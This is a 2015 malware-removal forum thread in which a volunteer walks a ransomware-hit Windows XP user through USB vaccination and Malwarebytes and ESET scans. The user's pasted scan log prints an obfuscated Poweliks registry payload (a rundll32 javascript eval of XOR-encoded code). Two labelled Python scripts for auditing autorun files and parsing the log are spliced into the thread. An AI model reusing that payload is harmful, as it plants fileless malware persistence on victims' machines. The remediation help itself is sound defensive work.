
Lots of viruses (including ransomware), but MalwareBytes can't find anything?


  • This topic is locked
13 replies to this topic

#1 Suiteheart

Suiteheart

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 16 November 2015 - 08:38 PM

Hello,

 

I have been hit with Cryptowall 3.0 and similar ransomware infections multiple times. My computer lags, crashes, and bluescreens often. There are tons of cmd.exe's and msiexec.exe's running on it at all times that just reappear whenever I try to end them. Certain programs can't open. I can tell my computer is infected but scans by MalwareBytes bring up nothing. 

 

There are a few things I would like to save that I'm preeeeetty sure haven't been encrypted, but I wouldn't want to move a virus to another clean computer by using a flash drive, and I'm not sure how good online cloud services are at detecting and removing viruses attached to files uploaded from an infected computer. Is there any way I could save these files and keep my other computers safe from the same viruses? Also, how can I make sure flash drives I've plugged into my infected computer do not contain any viruses so that I can use them again? 

 

I'm running 32bit Windows XP, SP3. Please let me know if you need any more information!

 

Thank you!! :)




 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 20 November 2015 - 04:44 PM

Greetings Suiteheart and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. Please do this.

===================================================

Panda USB Vaccine

--------------------
  • From a clean computer, please download Panda USB Vaccine and save it to your desktop
  • Double-click the icon to install the program to C:\Program Files\Panda USB Vaccine.
  • Read and accept the license agreement, then click Next.
  • When setup completes, make sure "Launch Panda USB Vaccine" is checked and click Finish to open the program.
  • Click the Vaccinate computer button. It should now show a green checkmark and confirm Computer vaccinated.
  • Hold down the Shift key and insert your external drive.
  • When the name of the drive appears in the dialog box, click the button to Vaccinate USB drive(s).
  • Exit the program when done
  • Leave the external drive attached to your computer
Note: Computer Vaccination will prevent any AutoRun file from running, regardless of whether the removable device is infected or not. USB Vaccination disables the autorun file so it cannot be read, modified or replaced and creates an AUTORUN_.INF as protection against malicious code. Once USB drives have been vaccinated, they cannot be reversed except with a format, meaning you will have to manually attempt to run something from the USB device rather than it running on its own simply by inserting the device. If you need to reformat the USB device to reverse this protection be sure to back up your data files first or they will be lost during the formatting process.

===================================================

Malwarebytes Anti-Malware Free and Malwarebytes Chameleon Including External Drive

----------
  • Download Malwarebytes Anti-Malware Free and save it to your desktop
  • Double click the desktop icon, click Run, then OK
  • Click Next
  • Select I accept the agreement then continue to click Next then finally click Install
  • Uncheck Enable free trial of Malwarebytes Anti-Malware Premium if you do not want the free trial of the paid version, then click Finish
  • If you are notified the Database is out of date click Update Now
  • Attach any external drives you want to scan if not already attached
  • Click the Scan button near the top
  • Select Custom Scan then click Scan Now >>
  • Place a check mark in any additional drives you would like to scan
  • Click Start Scan

----------
Note: If Malwarebytes will not launch please do the following to launch Malwarebytes Chameleon:
Click Start (Start, Search, All files and folders for Windows XP) then type mbam
Double click one of the four following files (if one does not work try the next one, and so on) - A black command window will open. Follow those instructions until the Malwarebytes program starts the scan

mbam-chameleon.scr
mbam-chameleon
mbam-chameleon.exe
mbam-chameleon.com

----------

  • When completed click the down arrow on Export Log and select Text file (*.txt)
  • Save the file to your desktop as MBAM
  • Click Apply Actions then restart your computer if requested
  • Copy and paste the contents of MBAM.txt in your reply
===================================================

ESET Online Scanner Including External Device

--------------------

I'd like us to scan your machine with ESET OnlineScan Including External Device. This process may take several hours, that is normal.
  • Attach your external device
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click Run ESET Online Scanner.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check YES, I accept the Terms of Use.
  • Click the Start button.
  • Click Enable detection of potentially unwanted applications
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Remove found threats
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
    • In the Current scan targets line click Change...
    • Place an additional check mark next to any attached external drives
    • Click OK, then Start
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Copy and paste the information in your next reply. Note: If no malware was found you will not get a log.
  • Click the Back button.
  • Click the Finish button.
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Malwarebytes log
  • ESET log

Edited by Oh My!, 20 November 2015 - 04:47 PM.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Suiteheart

Suiteheart
  • Topic Starter


Posted 21 November 2015 - 05:08 PM

Hello Gary! Sure, feel free to call me Marco! :)

 

Before I start, I have two questions about Panda USB Vaccine:

 

1. I am on a clean computer and can vaccinate it right now. However, I am afraid to vaccinate my USB drives because they are both plugged into the infected computer, and I don't want to take them out and plug them into this one, in case they already have viruses on them that can spread to and infect a clean computer. 

2. Which brings me to my next question. Is there a possibility that, even if I've disabled AutoRun, that if I access the drive in any way, the viruses inside can activate themselves and infect my computer? Even if the file I open from the drive is no way related to a virus? Viewing them from the computer they're currently attached to, I don't see any suspicious files that might be viruses, so I assume they'd be hidden. Which is, of course, exactly what I'm worried about - invisible files infecting my computer from the external drive.

 

I'm not computer savvy at all, so maybe I'm just missing something?

 

Also, do you need my FRST results? 

 

Anyway, thank you so much for your help! :D



#4 Oh My!


Posted 21 November 2015 - 06:40 PM

Hi Marco, nice to meet you.

The danger in attaching a USB you suspect may be infected comes from an Autorun infection on the USB that launches immediately upon insertion or the launching of a malicious file existing on the USB. By holding down the Shift Key when inserting the USB you are bypassing any Autorun feature. When Panda is run on the USB it actually locks up any Autorun feature so neither a malicious nor a legitimate Autorun feature is active.

If you follow the steps provided you will not transfer any potential malware onto your clean computer. The USB device remains passive while it is being evaluated and nothing will run without being launched. The scan programs will not launch anything on the USB.

I don't need any FRST reports if you believe your main computer is clean.

Does this answer your questions?
Gary
 
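An added example, not part of the thread or of Panda USB Vaccine: a read-only Python check of what posts #2 and #4 describe, listing the programs a drive's autorun.inf would start and hashing them without running anything. The function names and the sample drive contents are constructed for illustration; `open`, `shellexecute` and `shell\<verb>\command` are the standard autorun.inf launch keys.

```python
import hashlib
import os
import tempfile

# autorun.inf keys that name a program Windows would start.
LAUNCH_KEYS = ("open", "shellexecute")

def parse_autorun_inf(text):
    """Return (key, command) pairs from the [autorun] section that start a program."""
    launches, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key = key.lower()
        # shell\<verb>\command adds a right-click menu entry that runs a program
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            launches.append((key, value))
    return launches

def launch_target(command):
    """Program part of a command: the quoted string, else the first token."""
    command = command.strip()
    if command.startswith('"') and '"' in command[1:]:
        return command[1:command.index('"', 1)]
    return command.split()[0] if command else ""

def audit_drive_root(root):
    """Read-only inspection of a drive root; nothing on the drive is executed."""
    findings = []
    for name in os.listdir(root):
        path = os.path.join(root, name)
        if name.lower() != "autorun.inf" or not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        # Files with a UTF-16 byte-order mark are decoded as such, the rest byte-for-byte
        bom = data[:2] in (b"\xff\xfe", b"\xfe\xff")
        text = data.decode("utf-16", "replace") if bom else data.decode("latin-1")
        for key, command in parse_autorun_inf(text):
            # Resolve the named program relative to the drive root and hash it if present
            target = os.path.join(root, *launch_target(command).split("\\"))
            digest = None
            if os.path.isfile(target):
                with open(target, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
            findings.append({"key": key, "command": command, "sha256": digest})
    return findings

def demo():
    # Constructed sample: a throwaway directory standing in for a USB drive root.
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "AutoRun.inf"), "w") as fh:
            fh.write("; constructed sample\n[AutoRun]\nicon=drive.ico\n"
                     "open=tools\\setup.exe /quiet\n"
                     "shell\\explore\\command=\"missing helper.exe\"\n")
        os.mkdir(os.path.join(root, "tools"))
        with open(os.path.join(root, "tools", "setup.exe"), "wb") as fh:
            fh.write(b"MZ constructed placeholder, not a real program")
        return audit_drive_root(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A `sha256` of `None` means the file named in autorun.inf is not present at that path on the drive.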

#5 Oh My!


Posted 24 November 2015 - 09:50 AM

Greetings,

===================================================

3 Day Bump

It has been more than 3 days since my last post.
  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

Gary
 

#6 Suiteheart

Suiteheart
  • Topic Starter


Posted 24 November 2015 - 08:11 PM

Ah, yes, apologies!

 

Thanks for answering my questions, that helped a lot :)

 

I vaccinated my computer with Panda USB vaccine. Everything went well and no infections were transferred, just like you said! I am now running a scan with MalwareBytes.



#7 Oh My!


Posted 24 November 2015 - 08:14 PM

Great, let me know.
Gary
 

#8 Suiteheart

Suiteheart
  • Topic Starter


Posted 25 November 2015 - 12:37 AM

I'm going to go ahead and post the MalwareBytes log. Here you go!

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/24/2015
Scan Time: 7:58:43 PM
Logfile: MBAM-saveresults.txt
Administrator: Yes
 
Version: 2.2.0.1024
Malware Database: v2015.11.24.07
Rootkit Database: v2015.11.23.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows XP Service Pack 3
CPU: x86
File System: NTFS
User: Ripley
 
Scan Type: Custom Scan
Result: Completed
Objects Scanned: 321834
Time Elapsed: 1 hr, 26 min, 52 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 14
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Bedep, c:\documents and settings\all users\application data\{34f9e14e-0cc0-4146-8bab-1c06fafdac47}\dps.dll, , [eee9522ff09b71c5a1e47aa1b1508779], 
 
Registry Keys: 2
Trojan.Bedep, HKLM\SOFTWARE\CLASSES\CLSID\{FE01A8A8-A5C7-4C67-9A27-8A6A34E6E58E}, , [eee9522ff09b71c5a1e47aa1b1508779], 
Trojan.Poweliks, HKLM\SOFTWARE\CLASSES\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LOCALSERVER32\ ^ , , [9542f0913d4eb086b7ec91713dc3eb15], 
 
Registry Values: 11
Ransom.FileLocker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|d26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|*26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|d26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|*26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Spyware.PasswordStealer, HKU\S-1-5-21-448539723-1677128483-725345543-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|{7223E482-75AD-D8F9-2F9C-AA0A8BE69115}, "C:\Documents and Settings\Ripley\Application Data\Educed\heaqk.exe", , [4295e69b2e5da98df3623a3d22dffe02]
Spyware.PasswordStealer, HKU\S-1-5-21-448539723-1677128483-725345543-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|{A689A69B-37B4-0C53-2F9C-AA0A8BE69115}, "C:\Documents and Settings\Ripley\Application Data\Educed\heaqk.exe", , [4295e69b2e5da98df3623a3d22dffe02]
Trojan.FakeMS.ED, HKU\S-1-5-21-448539723-1677128483-725345543-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|UalyItjag, regsvr32.exe "C:\Documents and Settings\All Users\Application Data\UalyItjag\TadaHjebd.aam", , [7c5b562b0784d561f8679693669e8b75]
Rootkit.Rovnix.E, HKU\S-1-5-21-448539723-1677128483-725345543-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|BackUp3962972837, C:\Documents and Settings\Administrator\Application Data\BackUp3962972837.exe, , [ba1d2d54870489adfa49bef658abf808]
Trojan.Poweliks, HKLM\SOFTWARE\CLASSES\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LOCALSERVER32|a, rundll32.exe javascript:"qhpj5\..\mshtml,RunHTMLApplication ";eval("usxz)odv!@buhwdYNckdbu)#VRbshqu/Ridmm#((/Sto)#$vhoehs$]]rxrudl23]]vhoenvrqnvdsridmm]]w0/1]]qnvdsridmm/dyd!%25ysu5<)fq!&ijml;]]rnguv`sd]]bm`rrdr]]bmrhe]]z62D618D@,4E82,5C3D,CCC1,88C6829E@8D5|]]mnb`mrdswds23&(/`/rqmhu)(:hdy!)ZUdyu/Dobnehof\\;;@RBHH/FduRushof)ZBnowdsu\\;;GsnlC`rd75Rushof)%25ysu5Z2\\(((#-1-0(:|b`ubi)ysu5(z|:bmnrd)(:".replace(/./g,function(srf9){return(String.fromCharCode(srf9.charCodeAt()^1));}))
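
An added example, not part of the thread or of Malwarebytes: a Python triage of the log format posted above that collapses repeated detection lines and lists the programs registered under Run/RunOnce keys, so the same files can be checked again after quarantine. The function names are hypothetical and the sample is a few lines copied from the log.

```python
import re
from collections import Counter

# A few lines copied from the Malwarebytes log above (trimmed, so the
# section headers' counts no longer match the number of lines shown).
SAMPLE_LOG = r"""
Modules: 14
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Bedep, c:\documents and settings\all users\application data\{34f9e14e-0cc0-4146-8bab-1c06fafdac47}\dps.dll, , [eee9522ff09b71c5a1e47aa1b1508779], 

Registry Values: 11
Ransom.FileLocker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|d26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|d26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Spyware.PasswordStealer, HKU\S-1-5-21-448539723-1677128483-725345543-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|{7223E482-75AD-D8F9-2F9C-AA0A8BE69115}, "C:\Documents and Settings\Ripley\Application Data\Educed\heaqk.exe", , [4295e69b2e5da98df3623a3d22dffe02]
"""

SECTION = re.compile(r"^([A-Za-z ]+): (\d+)$")
# name, location[, data], , [32-hex id] with an optional trailing comma
DETECTION = re.compile(r"^(?P<name>[^,]+), (?P<body>.*), , \[(?P<id>[0-9a-f]{32})\],?$")
AUTOSTART = re.compile(r"\\CURRENTVERSION\\RUN(ONCE)?$", re.IGNORECASE)

def parse_log(text):
    """Return one dict per detection line, tagged with the section it appeared under."""
    section, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        header = SECTION.match(line)
        if header:
            section = header.group(1)
            continue
        m = DETECTION.match(line)
        if not m:
            continue
        entry = {"section": section, "name": m["name"], "location": m["body"],
                 "id": m["id"], "value": None, "data": None}
        # Registry value lines read KEY|valuename, data
        if section == "Registry Values" and "|" in m["body"]:
            key, rest = m["body"].split("|", 1)
            value, _, data = rest.partition(", ")
            entry.update(location=key, value=value, data=data)
        entries.append(entry)
    return entries

def triage(entries):
    """Collapse repeated lines and pick out what Run/RunOnce keys would start."""
    counts = Counter((e["section"], e["name"], e["location"], e["value"]) for e in entries)
    autostarts = sorted({(e["name"], e["data"]) for e in entries
                         if e["value"] is not None and AUTOSTART.search(e["location"])})
    return counts, autostarts

if __name__ == "__main__":
    counts, autostarts = triage(parse_log(SAMPLE_LOG))
    for (section, name, location, value), n in counts.items():
        print(f"{n:2d}x [{section}] {name}: {location}" + (f" | {value}" if value else ""))
    for name, program in autostarts:
        print(f"autostart: {name} -> {program}")
```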


#9 Oh My!


Posted 25 November 2015 - 10:00 AM

As you already know, your computer was quite infected. If you haven't quarantined those entries you should do so.

Let me know when you are all set then I will provide some closing information.
Gary
 

#10 Suiteheart

Suiteheart
  • Topic Starter


Posted 25 November 2015 - 01:20 PM

Oh, yes, yes it was! I have quarantined everything and my computer is running just fine right now.

 

Ready when you are, unless you need my ESET Online Scanner logs? 

 

Thank you so much for all your help! 



#11 Oh My!


Posted 25 November 2015 - 01:44 PM

No, I think we are all set. I would just like to leave you with some information to review if you are interested.

===================================================

Keeping Your Computer Safe

----------

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:

In addition, here are some more links you might find of interest:

I will leave this topic open for just a brief period of time in case you have any further issues then it will be closed shortly thereafter.

Thank you for placing your trust in BleepingComputer. It was a pleasure serving you.
Gary
 

#12 Suiteheart

Suiteheart
  • Topic Starter


Posted 25 November 2015 - 02:21 PM

Oh, wonderful! Thank you so, so much. 



#13 Oh My!


Posted 25 November 2015 - 02:47 PM

:thumbsup2:
Gary
 

#14 Oh My!


Posted 26 November 2015 - 09:17 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 



